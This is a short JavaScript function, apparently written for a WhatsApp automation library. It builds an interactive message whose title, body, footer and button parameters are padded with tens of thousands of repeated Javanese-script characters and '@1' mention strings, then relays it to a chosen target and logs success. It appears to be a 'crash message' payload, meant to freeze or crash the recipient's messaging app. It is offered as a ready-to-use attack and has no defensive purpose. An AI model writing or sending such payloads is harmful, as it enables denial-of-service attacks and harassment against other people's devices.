async function BlankWithProto(sock, target) {
    try {
        const message = {
            interactiveMessage: {
                header: {
                    title: "ꦾ".repeat(50000),
                    hasMediaAttachment: false
                },
                body: {
                    text: "ꦽ".repeat(60000)
                },
                footer: {
                    text: "@1".repeat(40000)
                },
                nativeFlowMessage: {
                    buttons: [
                        {
                            name: "booking_confirmation",
                            buttonParamsJson: "ꦾ".repeat(100000)
                        }
                    ]
                }
            }
        };
        
        const protoMessage = proto.Message.fromObject(message);
        
        await sock.relayMessage(target, protoMessage, {
            messageId: null,
            participant: { jid: target }
        });

        console.log(`[SUCCESS] Invisible buttons-first sent to ${target}`);
    } catch (err) {
        console.log("Error:", err);
    }
}
